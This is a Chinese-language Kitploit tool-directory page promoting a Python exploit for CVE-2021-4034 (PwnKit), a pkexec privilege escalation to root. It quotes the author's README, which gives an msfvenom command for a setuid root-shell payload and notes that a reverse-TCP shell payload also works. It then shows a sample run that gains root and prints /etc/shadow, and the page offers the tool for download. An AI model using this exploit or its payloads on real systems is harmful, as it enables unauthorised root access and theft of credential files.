Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-4034 — Python 针对 CVE-2021-4034 (PwnKit) 的漏洞利用程序,通过 pkexec 将权限提升至 root,并使用 msfvenom 载荷生成 root shell。 | Kitploit
工具/GitHubGitHub/joeammond/cve-2021-4034
权限提升Payload生成漏洞利用渗透测试二进制利用
GitHubjoeammond/cve-2021-4034

CVE-2021-4034

Python 针对 CVE-2021-4034 (PwnKit) 的漏洞利用程序,通过 pkexec 将权限提升至 root,并使用 msfvenom 载荷生成 root shell。

查看仓库
180394年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Python3 代码,用于利用 CVE-2021-4034 (PWNKIT)。 这是一次“我能否用 Python 实现这个?”的练习,并非 作为健壮的利用代码。它在我这里能跑通,可能还有 bug。

默认载荷会以 root 身份启动一个 shell,由 msfvenom 生成:

root@kitploit:~
msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64

我也测试过 linux/x64/shell_reverse_tcp。请确保在 msfvenom 命令中包含 PrependSetuid=true 参数,否则你只会得到一个 以当前用户身份运行的 shell,而不是 root。

代码借鉴自 blasty,原始版本 可在此处获取

root@kitploit:~
$ python CVE-2021-4034.py
[+] 正在为利用代码创建共享库。
[+] 正在调用 execve()
# id
uid=0(root) gid=1000(jra) groups=1000(jra),4(adm),27(sudo),119(lpadmin),998(lxd)
# whoami
root
# head /etc/shadow
root:*:18709:0:99999:7:::
daemon:*:18709:0:99999:7:::
bin:*:18709:0:99999:7:::
sys:*:18709:0:99999:7:::
sync:*:18709:0:99999:7:::
games:*:18709:0:99999:7:::
man:*:18709:0:99999:7:::
lp:*:18709:0:99999:7:::
mail:*:18709:0:99999:7:::
news:*:18709:0:99999:7:::
#
下载工具